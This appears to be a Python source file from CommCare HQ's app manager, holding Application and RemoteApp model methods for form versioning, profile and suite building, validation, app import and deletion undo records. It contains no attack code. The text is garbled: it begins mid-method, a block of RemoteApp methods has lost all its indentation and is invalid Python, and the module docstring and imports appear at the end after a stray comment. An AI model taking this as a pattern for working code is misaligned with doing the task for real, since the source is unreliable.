            form = self.get_module(module_id).get_form(form_id)
        return form.validate_form().render_xform(build_profile_id).encode('utf-8')
    def set_form_versions(self, previous_version, force_new_version=False):
        """
        Set the 'version' property on each form as follows to the current app version if the form is new
        or has changed since the last build. Otherwise set it to the version from the last build.

        A form's "changed" test compares an md5 of the previous build's
        compiled XForm against this app's freshly rendered XForm.
        """
        def _hash(val):
            return hashlib.md5(val).hexdigest()

        if previous_version:
            for form_stuff in self.get_forms(bare=False):
                filename = 'files/%s' % self.get_form_filename(**form_stuff)
                form = form_stuff["form"]
                if not force_new_version:
                    form_version = None
                    try:
                        previous_form = previous_version.get_form(form.unique_id)
                        # take the previous version's compiled form as-is
                        # (generation code may have changed since last build)
                        previous_source = previous_version.fetch_attachment(filename)
                    except (ResourceNotFound, FormNotFoundException):
                        # brand-new form: leave form_version None so it gets
                        # the current app version
                        pass
                    else:
                        previous_hash = _hash(previous_source)

                        # hack - temporarily set my version to the previous version
                        # so that that's not treated as the diff
                        previous_form_version = previous_form.get_version()
                        form.version = previous_form_version
                        my_hash = _hash(self.fetch_xform(form=form))
                        if previous_hash == my_hash:
                            form_version = previous_form_version

                    if form_version is None:
                        form.version = None
                    else:
                        form.version = form_version
                else:
                    form.version = None
    def set_media_versions(self, previous_version):
        """
        Set the media version numbers for all media in the app to the current app version
        if the media is new or has changed since the last build. Otherwise set it to the
        version from the last build.
        """

        # access to .multimedia_map is slow
        prev_multimedia_map = previous_version.multimedia_map if previous_version else {}

        for path, map_item in self.multimedia_map.iteritems():
            prev_map_item = prev_multimedia_map.get(path, None)
            if prev_map_item and prev_map_item.unique_id:
                # Re-use the id so CommCare knows it's the same resource
                map_item.unique_id = prev_map_item.unique_id
            if (prev_map_item and prev_map_item.version
                    and prev_map_item.multimedia_id == map_item.multimedia_id):
                # unchanged media: keep the old version
                map_item.version = prev_map_item.version
            else:
                map_item.version = self.version
    def ensure_module_unique_ids(self, should_save=False):
        """
        Creates unique_ids for modules that don't have unique_id attributes
        should_save: the doc will be saved only if should_save is set to True

        WARNING: If called on the same doc in different requests without saving,
        this function will set different uuid each time,
        likely causing unexpected behavior
        """
        if any(not mod.unique_id for mod in self.modules):
            for mod in self.modules:
                mod.get_or_create_unique_id()
            if should_save:
                self.save()

    def create_app_strings(self, lang, build_profile_id=None):
        """Render the app-strings file for ``lang`` ('default' means the
        fallback strings file) using the configured translation strategy."""
        gen = app_strings.CHOICES[self.translation_strategy]
        if lang == 'default':
            return gen.create_default_app_strings(self, build_profile_id)
        else:
            return gen.create_app_strings(self, lang)
    @property
    def skip_validation(self):
        # value of the 'cc-content-valid' profile property; 'yes' by default
        properties = (self.profile or {}).get('properties', {})
        return properties.get('cc-content-valid', 'yes')

    @property
    def jad_settings(self):
        # extend the base JAD settings with the validation-skip flag
        s = super(Application, self).jad_settings
        s.update({
            'Skip-Validation': self.skip_validation,
        })
        return s
    def create_profile(self, is_odk=False, with_media=False,
                       template='app_manager/profile.xml', build_profile_id=None):
        """Render the profile XML (utf-8 bytes) for this app.

        Merges the app's saved profile settings with commcare_settings
        defaults, then applies forced overrides (case sharing, logo
        properties, custom properties) before rendering ``template``.
        """
        # NOTE(review): unusual local name — presumably a leftover from a
        # rename of self.profile; it is just a local alias
        self__profile = self.profile
        app_profile = defaultdict(dict)

        for setting in commcare_settings.get_custom_commcare_settings():
            setting_type = setting['type']
            setting_id = setting['id']

            if setting_type not in ('properties', 'features'):
                setting_value = None
            elif setting_id not in self__profile.get(setting_type, {}):
                # not explicitly set on the app: emit our default only when it
                # differs from CommCare's own built-in default
                if 'commcare_default' in setting and setting['commcare_default'] != setting['default']:
                    setting_value = setting['default']
                else:
                    setting_value = None
            else:
                setting_value = self__profile[setting_type][setting_id]
            if setting_value:
                app_profile[setting_type][setting_id] = {
                    'value': setting_value,
                    'force': setting.get('force', False)
                }
            # assert that it gets explicitly set once per loop
            del setting_value

        if self.case_sharing:
            # case sharing requires server tethering; always forced
            app_profile['properties']['server-tether'] = {
                'force': True,
                'value': 'sync',
            }

        logo_refs = [logo_name for logo_name in self.logo_refs if logo_name in ANDROID_LOGO_PROPERTY_MAPPING]
        if logo_refs and domain_has_privilege(self.domain, privileges.COMMCARE_LOGO_UPLOADER):
            for logo_name in logo_refs:
                app_profile['properties'][ANDROID_LOGO_PROPERTY_MAPPING[logo_name]] = {
                    'value': self.logo_refs[logo_name]['path'],
                }

        if with_media:
            profile_url = self.media_profile_url if not is_odk else (self.odk_media_profile_url + '?latest=true')
        else:
            profile_url = self.profile_url if not is_odk else (self.odk_profile_url + '?latest=true')

        if toggles.CUSTOM_PROPERTIES.enabled(self.domain) and "custom_properties" in self__profile:
            app_profile['custom_properties'].update(self__profile['custom_properties'])

        locale = self.get_build_langs(build_profile_id)[0]
        return render_to_string(template, {
            'is_odk': is_odk,
            'app': self,
            'profile_url': profile_url,
            'app_profile': app_profile,
            'cc_user_domain': cc_user_domain(self.domain),
            'include_media_suite': with_media,
            'uniqueid': self.copy_of or self.id,
            'name': self.name,
            'descriptor': u"Profile File",
            'build_profile_id': build_profile_id,
            'locale': locale
        }).encode('utf-8')
    @property
    def custom_suite(self):
        """Hand-written suite XML attachment, or '' when none is set."""
        try:
            return self.lazy_fetch_attachment('custom_suite.xml')
        except ResourceNotFound:
            return ""

    def set_custom_suite(self, value):
        self.put_attachment(value, 'custom_suite.xml')

    def create_suite(self, build_profile_id=None):
        """Render suite.xml: templated for legacy v1 apps, generated by
        SuiteGenerator otherwise."""
        if self.application_version == APP_V1:
            template = 'app_manager/suite-%s.xml' % self.application_version
            langs = self.get_build_langs(build_profile_id)
            return render_to_string(template, {
                'app': self,
                'langs': ["default"] + langs
            })
        else:
            return SuiteGenerator(self, build_profile_id).generate_suite()

    def create_media_suite(self, build_profile_id=None):
        return MediaSuiteGenerator(self, build_profile_id).generate_suite()
    @classmethod
    def get_form_filename(cls, type=None, form=None, module=None):
        # canonical path of a form file within the build's files/ tree
        return 'modules-%s/forms-%s.xml' % (module.id, form.id)

    def create_all_files(self, build_profile_id=None):
        """Build the complete {path: content} mapping for this app's files
        (profiles, suites, app strings, and every form's XForm). Paths are
        prefixed with '<build_profile_id>/' when building a profile.
        """
        prefix = '' if not build_profile_id else build_profile_id + '/'
        files = {
            '{}profile.xml'.format(prefix): self.create_profile(is_odk=False, build_profile_id=build_profile_id),
            '{}profile.ccpr'.format(prefix): self.create_profile(is_odk=True, build_profile_id=build_profile_id),
            '{}media_profile.xml'.format(prefix):
                self.create_profile(is_odk=False, with_media=True, build_profile_id=build_profile_id),
            '{}media_profile.ccpr'.format(prefix):
                self.create_profile(is_odk=True, with_media=True, build_profile_id=build_profile_id),
            '{}suite.xml'.format(prefix): self.create_suite(build_profile_id),
            '{}media_suite.xml'.format(prefix): self.create_media_suite(build_profile_id),
        }

        langs_for_build = self.get_build_langs(build_profile_id)
        for lang in ['default'] + langs_for_build:
            files["{prefix}{lang}/app_strings.txt".format(
                prefix=prefix, lang=lang)] = self.create_app_strings(lang, build_profile_id)
        for form_stuff in self.get_forms(bare=False):
            filename = prefix + self.get_form_filename(**form_stuff)
            form = form_stuff['form']
            try:
                files[filename] = self.fetch_xform(form=form, build_profile_id=build_profile_id)
            except XFormException as e:
                # surface which form failed; the raw error lacks that context
                raise XFormException(_('Error in form "{}": {}').format(trans(form.name), unicode(e)))
        return files
    # iterator over modules, each wrapped with its index (IndexedSchema)
    get_modules = IndexedSchema.Getter('modules')

    @parse_int([1])
    def get_module(self, i):
        """Return module ``i`` (int or numeric string; negative wraps)."""
        try:
            return self.modules[i].with_id(i % len(self.modules), self)
        except IndexError:
            raise ModuleNotFoundException()

    def get_module_by_unique_id(self, unique_id):
        """Return the module with the given unique_id, creating ids on the
        fly for modules that lack one; raises ModuleNotFoundException."""
        def matches(module):
            return module.get_or_create_unique_id() == unique_id
        for obj in self.get_modules():
            if matches(obj):
                return obj
        raise ModuleNotFoundException(
            ("Module in app '%s' with unique id '%s' not found"
             % (self.id, unique_id)))
    def get_forms(self, bare=True):
        """Yield every form in the app; with bare=False each item is a dict
        {'type': 'module_form', 'module': ..., 'form': ...}."""
        for module in self.get_modules():
            for form in module.get_forms():
                yield form if bare else {
                    'type': 'module_form',
                    'module': module,
                    'form': form
                }

    def get_form(self, unique_form_id, bare=True):
        """Return the form (or the bare=False dict) with the given unique id;
        raises FormNotFoundException."""
        def matches(form):
            return form.get_unique_id() == unique_form_id
        for obj in self.get_forms(bare):
            if matches(obj if bare else obj['form']):
                return obj
        raise FormNotFoundException(
            ("Form in app '%s' with unique id '%s' not found"
             % (self.id, unique_form_id)))

    def get_form_location(self, unique_form_id):
        """Return the (module_index, form_index) of the form; raises KeyError."""
        for m_index, module in enumerate(self.get_modules()):
            for f_index, form in enumerate(module.get_forms()):
                if unique_form_id == form.unique_id:
                    return m_index, f_index
        raise KeyError("Form in app '%s' with unique id '%s' not found" % (self.id, unique_form_id))
    @classmethod
    def new_app(cls, domain, name, application_version, lang="en"):
        """Construct an empty app in ``domain`` with one language."""
        app = cls(domain=domain, modules=[], name=name, langs=[lang], application_version=application_version)
        return app

    def add_module(self, module):
        # append and return the wrapped (indexed) module
        self.modules.append(module)
        return self.get_module(-1)

    def delete_module(self, module_unique_id):
        """Delete a module and return a saved DeleteModuleRecord for undo,
        or None when no such module exists."""
        try:
            module = self.get_module_by_unique_id(module_unique_id)
        except ModuleNotFoundException:
            return None
        record = DeleteModuleRecord(
            domain=self.domain,
            app_id=self.id,
            module_id=module.id,
            module=module,
            datetime=datetime.datetime.utcnow()
        )
        del self.modules[module.id]
        record.save()
        return record

    def new_form(self, module_id, name, lang, attachment=""):
        # delegate creation to the module
        module = self.get_module(module_id)
        return module.new_form(name, lang, attachment)
    def delete_form(self, module_unique_id, form_unique_id):
        """Delete a form and return a saved DeleteFormRecord for undo, or
        None when the module or form cannot be found."""
        try:
            module = self.get_module_by_unique_id(module_unique_id)
            form = self.get_form(form_unique_id)
        except (ModuleNotFoundException, FormNotFoundException):
            return None

        # record is saved before deletion so the form content survives for undo
        record = DeleteFormRecord(
            domain=self.domain,
            app_id=self.id,
            module_unique_id=module_unique_id,
            form_id=form.id,
            form=form,
            datetime=datetime.datetime.utcnow(),
        )
        record.save()

        try:
            form.pre_delete_hook()
        except NotImplementedError:
            # hook is optional per form type
            pass

        del module['forms'][form.id]
        return record
    def rename_lang(self, old_lang, new_lang):
        """Rename a language code everywhere it appears: app langs, build
        profiles, modules, and translations. Raises AppEditingError when
        ``new_lang`` already exists."""
        validate_lang(new_lang)
        if old_lang == new_lang:
            return
        if new_lang in self.langs:
            raise AppEditingError("Language %s already exists!" % new_lang)
        for i, lang in enumerate(self.langs):
            if lang == old_lang:
                self.langs[i] = new_lang
        for profile in self.build_profiles:
            for i, lang in enumerate(profile.langs):
                if lang == old_lang:
                    profile.langs[i] = new_lang
        for module in self.get_modules():
            module.rename_lang(old_lang, new_lang)
        _rename_key(self.translations, old_lang, new_lang)

    def rearrange_modules(self, i, j):
        """Move module ``j`` to position ``i``; raises RearrangeError on a
        bad index."""
        modules = self.modules
        try:
            modules.insert(i, modules.pop(j))
        except IndexError:
            raise RearrangeError()
        self.modules = modules
    def rearrange_forms(self, to_module_id, from_module_id, i, j):
        """
        The case type of the two modules conflict,
        ConflictingCaseTypeError is raised,
        but the rearrangement (confusingly) goes through anyway.
        This is intentional.
        """
        to_module = self.get_module(to_module_id)
        from_module = self.get_module(from_module_id)
        try:
            from_module.forms[j].pre_move_hook(from_module, to_module)
        except NotImplementedError:
            # hook is optional per form type
            pass
        try:
            form = from_module.forms.pop(j)
            to_module.add_insert_form(from_module, form, index=i, with_source=True)
        except IndexError:
            raise RearrangeError()
        # raised AFTER the move so the caller can warn yet keep the change
        if to_module.case_type != from_module.case_type:
            raise ConflictingCaseTypeError()

    def scrub_source(self, source):
        # regenerate unique ids so a pasted/imported source can't collide
        return update_unique_ids(source)
    def copy_form(self, module_id, form_id, to_module_id):
        """
        The case type of the two modules conflict,
        ConflictingCaseTypeError is raised,
        but the copying (confusingly) goes through anyway.
        This is intentional.
        """
        from_module = self.get_module(module_id)
        form = from_module.get_form(form_id)
        to_module = self.get_module(to_module_id)
        self._copy_form(from_module, form, to_module, rename=True)

    def _copy_form(self, from_module, form, to_module, *args, **kwargs):
        """Insert a deep copy of ``form`` into ``to_module``; with
        rename=True the copy's name is prefixed per-language."""
        if not form.source:
            raise BlankXFormError()

        copy_source = deepcopy(form.to_json())
        # the copy must get its own unique_id
        if 'unique_id' in copy_source:
            del copy_source['unique_id']

        if 'rename' in kwargs and kwargs['rename']:
            for lang, name in copy_source['name'].iteritems():
                with override(lang):
                    copy_source['name'][lang] = _('Copy of {name}').format(name=name)

        copy_form = to_module.add_insert_form(from_module, FormBase.wrap(copy_source))
        save_xform(self, copy_form, form.source)

        # raised AFTER the copy so the caller can warn yet keep the change
        if from_module['case_type'] != to_module['case_type']:
            raise ConflictingCaseTypeError()
    @cached_property
    def has_case_management(self):
        """True when any form in the app has active case actions."""
        for module in self.get_modules():
            for form in module.get_forms():
                if len(form.active_actions()) > 0:
                    return True
        return False

    @memoized
    def case_type_exists(self, case_type):
        return case_type in self.get_case_types()

    @memoized
    def get_case_types(self):
        """Set of all case types used by the app's modules, plus the
        usercase type when the domain uses usercases."""
        extra_types = set()
        if is_usercase_in_use(self.domain):
            extra_types.add(USERCASE_TYPE)
        return set(chain(*[m.get_case_types() for m in self.get_modules()])) | extra_types

    def has_media(self):
        return len(self.multimedia_map) > 0

    @memoized
    def get_xmlns_map(self):
        # xmlns -> list of forms sharing it (should be exactly one each)
        xmlns_map = defaultdict(list)
        for form in self.get_forms():
            xmlns_map[form.xmlns].append(form)
        return xmlns_map
    def get_form_by_xmlns(self, xmlns, log_missing=True):
        """Return the unique form with ``xmlns``, or None (logging unless
        told not to). Device reports are never matched."""
        if xmlns == "http://code.javarosa.org/devicereport":
            return None
        forms = self.get_xmlns_map()[xmlns]
        if len(forms) != 1:
            # duplicates are always logged; absence only when log_missing
            if log_missing or len(forms) > 1:
                logging.error('App %s in domain %s has %s forms with xmlns %s' % (
                    self.get_id,
                    self.domain,
                    len(forms),
                    xmlns,
                ))
            return None
        else:
            form, = forms
        return form

    def get_questions(self, xmlns):
        """Questions of the form with ``xmlns``, or [] when not found."""
        form = self.get_form_by_xmlns(xmlns)
        if not form:
            return []
        return form.get_questions(self.langs)
    def check_subscription(self):
        """Return subscription-related validation errors (currently: usercase
        usage without the USER_CASE privilege)."""

        def app_uses_usercase(app):
            return any(m.uses_usercase() for m in app.get_modules())

        errors = []
        if app_uses_usercase(self) and not domain_has_privilege(self.domain, privileges.USER_CASE):
            errors.append({
                'type': 'subscription',
                'message': _('Your application is using User Case functionality. You can remove User Case '
                             'functionality by opening the User Case Management tab in a form that uses it, and '
                             'clicking "Remove User Case Properties".')
            })
        return errors
    def validate_app(self):
        """Application-specific validation: languages, module/form checks,
        duplicate xmlns, dependency cycles, and subscription limits. Falls
        back to the base-class (build) validation only when no errors were
        found here. Returns a list of error dicts."""
        xmlns_count = defaultdict(int)
        errors = []

        for lang in self.langs:
            if not lang:
                errors.append({'type': 'empty lang'})

        if not self.modules:
            errors.append({'type': "no modules"})
        for module in self.get_modules():
            errors.extend(module.validate_for_build())

        for form in self.get_forms():
            errors.extend(form.validate_for_build(validate_module=False))

            # make sure that there aren't duplicate xmlns's
            xmlns_count[form.xmlns] += 1
            for xmlns in xmlns_count:
                if xmlns_count[xmlns] > 1:
                    errors.append({'type': "duplicate xmlns", "xmlns": xmlns})

        if any(not module.unique_id for module in self.get_modules()):
            raise ModuleIdMissingException
        modules_dict = {m.unique_id: m for m in self.get_modules()}

        def _parent_select_fn(module):
            # returns the parent-select target id, or None when inactive
            if hasattr(module, 'parent_select') and module.parent_select.active:
                return module.parent_select.module_id

        if self._has_dependency_cycle(modules_dict, _parent_select_fn):
            errors.append({'type': 'parent cycle'})

        errors.extend(self._child_module_errors(modules_dict))
        errors.extend(self.check_subscription())

        if not errors:
            errors = super(Application, self).validate_app()
        return errors
    def _has_dependency_cycle(self, modules, neighbour_id_fn):
        """
        Detect dependency cycles given modules and the neighbour_id_fn

        :param modules: A mapping of module unique_ids to Module objects
        :neighbour_id_fn: function to get the neibour module unique_id
        :return: True if there is a cycle in the module relationship graph
        """
        # DFS with two colors: `visited` = entered, `completed` = fully
        # explored. Re-entering a visited-but-not-completed node is a cycle.
        # NOTE(review): nodes are tracked by m.id (the module's index), not
        # unique_id — assumed equivalent as a per-module key here; confirm.
        visited = set()
        completed = set()

        def cycle_helper(m):
            if m.id in visited:
                if m.id in completed:
                    return False
                return True
            visited.add(m.id)
            parent = modules.get(neighbour_id_fn(m), None)
            if parent is not None and cycle_helper(parent):
                return True
            completed.add(m.id)
            return False
        for module in modules.values():
            if cycle_helper(module):
                return True
        return False

    def _child_module_errors(self, modules_dict):
        """Errors in the root_module graph: cycles and references to
        unknown root modules."""
        module_errors = []

        def _root_module_fn(module):
            if hasattr(module, 'root_module_id'):
                return module.root_module_id

        if self._has_dependency_cycle(modules_dict, _root_module_fn):
            module_errors.append({'type': 'root cycle'})

        module_ids = set([m.unique_id for m in self.get_modules()])
        root_ids = set([_root_module_fn(m) for m in self.get_modules() if _root_module_fn(m) is not None])
        if not root_ids.issubset(module_ids):
            module_errors.append({'type': 'unknown root'})
        return module_errors
    def get_profile_setting(self, s_type, s_id):
        """Resolve a profile setting's effective value: the app's explicit
        value, else the first matching contingent default from the settings
        yaml, else the disabled default when the build predates the setting,
        else the plain default."""
        setting = self.profile.get(s_type, {}).get(s_id)
        if setting is not None:
            return setting
        yaml_setting = commcare_settings.get_commcare_settings_lookup()[s_type][s_id]
        for contingent in yaml_setting.get("contingent_default", []):
            if check_condition(self, contingent["condition"]):
                setting = contingent["value"]
        if setting is not None:
            return setting
        if self.build_version < yaml_setting.get("since", "0"):
            setting = yaml_setting.get("disabled_default", None)
            if setting is not None:
                return setting
        return yaml_setting.get("default")
    @property
    def has_careplan_module(self):
        return any((module for module in self.modules if isinstance(module, CareplanModule)))

    @quickcache(['self.version'])
    def get_case_metadata(self):
        """Build AppCaseMetadata for the app: per-type relationships, form
        contributions, and the parent/child type hierarchy. Types that never
        appear in the computed hierarchy are flagged with an error."""
        from corehq.apps.reports.formdetails.readable import AppCaseMetadata
        builder = ParentCasePropertyBuilder(self)
        case_relationships = builder.get_parent_type_map(self.get_case_types())
        meta = AppCaseMetadata()

        for case_type, relationships in case_relationships.items():
            type_meta = meta.get_type(case_type)
            type_meta.relationships = relationships

        for module in self.get_modules():
            for form in module.get_forms():
                form.update_app_case_meta(meta)

        seen_types = []

        def get_children(case_type):
            seen_types.append(case_type)
            return [type_.name for type_ in meta.case_types if type_.relationships.get('parent') == case_type]

        def get_hierarchy(case_type):
            # recursive child map {child: {grandchild: ...}}
            return {child: get_hierarchy(child) for child in get_children(case_type)}

        roots = [type_ for type_ in meta.case_types if not type_.relationships]
        for type_ in roots:
            meta.type_hierarchy[type_.name] = get_hierarchy(type_.name)

        for type_ in meta.case_types:
            if type_.name not in seen_types:
                # unreachable from any root: hierarchy is inconsistent
                meta.type_hierarchy[type_.name] = {}
                type_.error = _("Error in case type hierarchy")

        return meta

    def get_subcase_types(self, case_type):
        """
        Return the subcase types defined across an app for the given case type
        """
        return {t for m in self.get_modules()
                if m.case_type == case_type
                for t in m.get_subcase_types()}
class RemoteApp(ApplicationBase):
    """
    A wrapper for a url pointing to a suite or profile file. This allows you to
    write all the files for an app by hand, and then give the url to app_manager
    and let it package everything together for you.
    """
    profile_url = StringProperty(default="http://")
    name = StringProperty()
    # whether HQ rewrites the URLs inside the fetched profile/suite
    manage_urls = BooleanProperty(default=False)

    questions_map = DictProperty(required=False)

    def is_remote_app(self):
        return True

    @classmethod
    def new_app(cls, domain, name, lang='en'):
        app = cls(domain=domain, name=name, langs=[lang])
        return app
    def create_profile(self, is_odk=False, langs=None):
        # we don't do odk for now anyway
        return remote_app.make_remote_profile(self, langs)

    def strip_location(self, location):
        # normalize a resource location relative to the profile URL
        return remote_app.strip_location(self.profile_url, location)

    def fetch_file(self, location):
        """Fetch ``location`` (relative to profile_url) over HTTP and return
        (normalized_location, content); network failures become
        AppEditingError."""
        location = self.strip_location(location)
        url = urljoin(self.profile_url, location)

        try:
            content = urlopen(url).read()
        except Exception:
            raise AppEditingError('Unable to access resource url: "%s"' % url)

        return location, content

    def get_build_langs(self):
        """Languages for the build; remote apps support at most one build
        profile (created by a lazy migration)."""
        if self.build_profiles:
            if len(self.build_profiles.keys()) > 1:
                raise AppEditingError('More than one app profile for a remote app')
            else:
                # return first profile, generated as part of lazy migration
                return self.build_profiles[self.build_profiles.keys()[0]].langs
        else:
            return self.langs
@classmethod
def get_locations(cls, suite):
for resource in suite.findall('*/resource'):
try:
loc = resource.findtext('location[@authority="local"]')
except Exception:
loc = resource.findtext('location[@authority="remote"]')
yield resource.getparent().tag, loc
@property
def SUITE_XPATH(self):
return 'suite/resource/location[@authority="local"]'
def create_all_files(self, build_profile_id=None):
langs_for_build = self.get_build_langs()
files = {
'profile.xml': self.create_profile(langs=langs_for_build),
}
tree = _parse_xml(files['profile.xml'])
def add_file_from_path(path, strict=False, transform=None):
added_files = []
# must find at least one
try:
tree.find(path).text
except (TypeError, AttributeError):
if strict:
raise AppEditingError("problem with file path reference!")
else:
return
for loc_node in tree.findall(path):
loc, file = self.fetch_file(loc_node.text)
if transform:
file = transform(file)
files[loc] = file
added_files.append(file)
return added_files
add_file_from_path('features/users/logo')
try:
suites = add_file_from_path(
self.SUITE_XPATH,
strict=True,
transform=(lambda suite:
remote_app.make_remote_suite(self, suite))
)
except AppEditingError:
raise AppEditingError(ugettext('Problem loading suite file from profile file. Is your profile file correct?'))
for suite in suites:
suite_xml = _parse_xml(suite)
for tag, location in self.get_locations(suite_xml):
location, data = self.fetch_file(location)
if tag == 'xform' and langs_for_build:
try:
xform = XForm(data)
except XFormException as e:
raise XFormException('In file %s: %s' % (location, e))
xform.exclude_languages(whitelist=langs_for_build)
data = xform.render()
files.update({location: data})
return files
def make_questions_map(self):
langs_for_build = self.get_build_langs()
if self.copy_of:
xmlns_map = {}
def fetch(location):
filepath = self.strip_location(location)
return self.fetch_attachment('files/%s' % filepath)
profile_xml = _parse_xml(fetch('profile.xml'))
suite_location = profile_xml.find(self.SUITE_XPATH).text
suite_xml = _parse_xml(fetch(suite_location))
for tag, location in self.get_locations(suite_xml):
if tag == 'xform':
xform = XForm(fetch(location))
xmlns = xform.data_node.tag_xmlns
questions = xform.get_questions(langs_for_build)
xmlns_map[xmlns] = questions
return xmlns_map
else:
return None
def get_questions(self, xmlns):
if not self.questions_map:
self.questions_map = self.make_questions_map()
if not self.questions_map:
return []
self.save()
questions = self.questions_map.get(xmlns, [])
return questions
# Map couch doc_type strings (including the -Deleted tombstone variants)
# to the model class used to wrap them.
str_to_cls = {
    "Application": Application,
    "Application-Deleted": Application,
    "RemoteApp": RemoteApp,
    "RemoteApp-Deleted": RemoteApp,
}
def import_app(app_id_or_source, domain, source_properties=None, validate_source_domain=None):
    """Copy an app into ``domain`` and save it.

    :param app_id_or_source: either an app id string or an exported app source dict
    :param source_properties: optional dict of properties to set on the copy
    :param validate_source_domain: optional callable invoked with the source
        domain (only when importing by id); may raise to block the import
    :return: the newly saved app
    """
    if isinstance(app_id_or_source, basestring):
        app_id = app_id_or_source
        source = get_app(None, app_id)
        src_dom = source['domain']
        if validate_source_domain:
            validate_source_domain(src_dom)
        source = source.export_json()
        source = json.loads(source)
    else:
        cls = str_to_cls[app_id_or_source['doc_type']]
        # Don't modify original app source
        app = cls.wrap(deepcopy(app_id_or_source))
        source = app.export_json(dump_json=False)
    try:
        attachments = source['_attachments']
    except KeyError:
        attachments = {}
    finally:
        # attachments are re-added explicitly below via the blob db
        source['_attachments'] = {}
    if source_properties is not None:
        for key, value in source_properties.iteritems():
            source[key] = value
    cls = str_to_cls[source['doc_type']]
    # Allow the wrapper to update to the current default build_spec
    if 'build_spec' in source:
        del source['build_spec']
    app = cls.from_source(source, domain)
    app.cloudcare_enabled = domain_has_privilege(domain, privileges.CLOUDCARE)
    with app.atomic_blobs():
        # only copy over xml attachments (forms etc.)
        for name, attachment in attachments.items():
            if re.match(ATTACHMENT_REGEX, name):
                app.put_attachment(attachment, name)
    if not app.is_remote_app():
        # make the copied multimedia valid in the target domain too
        for _, m in app.get_media_objects():
            if domain not in m.valid_domains:
                m.valid_domains.append(domain)
                m.save()
    if not app.is_remote_app() and any(module.uses_usercase() for module in app.get_modules()):
        from corehq.apps.app_manager.util import enable_usercase
        enable_usercase(domain)
    return app
class DeleteApplicationRecord(DeleteRecord):
    """Undo-record for a deleted application."""
    app_id = StringProperty()

    def undo(self):
        """Restore the app by resetting its doc_type from the -Deleted variant."""
        deleted_app = ApplicationBase.get(self.app_id)
        deleted_app.doc_type = deleted_app.get_doc_type()
        deleted_app.save(increment_version=False)
class DeleteModuleRecord(DeleteRecord):
    """Undo-record for a module deleted from an app."""
    app_id = StringProperty()
    module_id = IntegerProperty()
    module = SchemaProperty(ModuleBase)

    def undo(self):
        """Re-insert the saved module into the app at its original position."""
        target_app = Application.get(self.app_id)
        restored_modules = target_app.modules
        restored_modules.insert(self.module_id, self.module)
        target_app.modules = restored_modules
        target_app.save()
class DeleteFormRecord(DeleteRecord):
    """Undo-record for a form deleted from a module."""
    app_id = StringProperty()
    module_id = IntegerProperty()
    module_unique_id = StringProperty()
    form_id = IntegerProperty()
    form = SchemaProperty(FormBase)

    def undo(self):
        """Re-insert the saved form into its module at its original index."""
        target_app = Application.get(self.app_id)
        if self.module_unique_id is not None:
            target_module = target_app.get_module_by_unique_id(self.module_unique_id)
        else:
            target_module = target_app.modules[self.module_id]
        restored_forms = target_module.forms
        restored_forms.insert(self.form_id, self.form)
        target_module.forms = restored_forms
        target_app.save()
class CareplanAppProperties(DocumentSchema):
    # Careplan settings for a single app within a domain's CareplanConfig.
    name = StringProperty()
    latest_release = StringProperty()
    case_type = StringProperty()
    goal_conf = DictProperty()
    task_conf = DictProperty()
class CareplanConfig(Document):
    """Per-domain careplan configuration, keyed by app id."""
    domain = StringProperty()
    app_configs = SchemaDictProperty(CareplanAppProperties)

    @classmethod
    def for_domain(cls, domain):
        """Return the (cached) config document for ``domain``, or None."""
        results = cache_core.cached_view(
            cls.get_db(),
            "by_domain_doc_type_date/view",
            key=[domain, 'CareplanConfig', None],
            reduce=False,
            include_docs=True,
            wrapper=cls.wrap)
        return results[0] if len(results) > 0 else None
# backwards compatibility with suite-1.0.xml
# These id accessors are monkey-patched onto the model classes so that legacy
# suite-generation code can keep calling them as methods.
FormBase.get_command_id = lambda self: id_strings.form_command(self)
FormBase.get_locale_id = lambda self: id_strings.form_locale(self)

ModuleBase.get_locale_id = lambda self: id_strings.module_locale(self)

ModuleBase.get_case_list_command_id = lambda self: id_strings.case_list_command(self)
ModuleBase.get_case_list_locale_id = lambda self: id_strings.case_list_locale(self)

Module.get_referral_list_command_id = lambda self: id_strings.referral_list_command(self)
Module.get_referral_list_locale_id = lambda self: id_strings.referral_list_locale(self)
# A module has one search config with many properties
# coding=utf-8
"""
Application terminology
For any given application, there are a number of different documents.
The primary application document is an instance of Application. This
document id is what you'll see in the URL on most app manager pages. Primary
application documents should have `copy_of == None` and `is_released ==
False`. When an application is saved, the field `version` is incremented.
When a user makes a build of an application, a copy of the primary
application document is made. These documents are the "versions" you see on
the deploy page. Each build document will have a different id, and the
`copy_of` field will be set to the ID of the primary application document.
Additionally, some attachments such as `profile.xml` and `suite.xml` will be
created and saved to the build doc (see `create_all_files`).
When a build is starred, this is called "releasing" the build. The parameter
`is_released` will be set to True on the build document.
You might also run into remote applications and applications copied to be
published on the exchange, but those are quite infrequent.
"""
import calendar
from distutils.version import LooseVersion
from itertools import chain
import tempfile
import os
import logging
import hashlib
import random
import json
import types
import re
import datetime
import uuid
from collections import defaultdict, namedtuple
from functools import wraps
from copy import deepcopy
from mimetypes import guess_type
from urllib2 import urlopen
from urlparse import urljoin
from couchdbkit import MultipleResultsFound
import itertools
from lxml import etree
from django.core.cache import cache
from django.utils.translation import override, ugettext as _, ugettext
from couchdbkit.exceptions import BadValueError
from corehq.apps.app_manager.suite_xml.utils import get_select_chain
from corehq.apps.app_manager.suite_xml.generator import SuiteGenerator, MediaSuiteGenerator
from corehq.apps.app_manager.xpath_validator import validate_xpath
from corehq.apps.userreports.exceptions import ReportConfigurationNotFoundError
from dimagi.ext.couchdbkit import *
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.core.urlresolvers import reverse
from django.template.loader import render_to_string
from restkit.errors import ResourceError
from couchdbkit.resource import ResourceNotFound
from corehq import toggles, privileges
from corehq.blobs.mixin import BlobMixin
from corehq.const import USER_DATE_FORMAT, USER_TIME_FORMAT
from corehq.apps.app_manager.feature_support import CommCareFeatureSupportMixin
from corehq.util.quickcache import quickcache
from corehq.util.timezones.conversions import ServerTime
from dimagi.utils.couch import CriticalSection
from django_prbac.exceptions import PermissionDenied
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.app_manager.commcare_settings import check_condition
from corehq.apps.app_manager.const import *
from corehq.apps.app_manager.xpath import (
dot_interpolate,
interpolate_xpath,
LocationXpath,
)
from corehq.apps.builds import get_default_build_spec
from dimagi.utils.couch.cache import cache_core
from dimagi.utils.couch.undo import DeleteRecord, DELETED_SUFFIX
from dimagi.utils.dates import DateSpan
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.make_uuid import random_hex
from dimagi.utils.web import get_url_base, parse_int
import commcare_translations
from corehq.util import bitly
from corehq.util import view_utils
from corehq.apps.appstore.models import SnapshotMixin
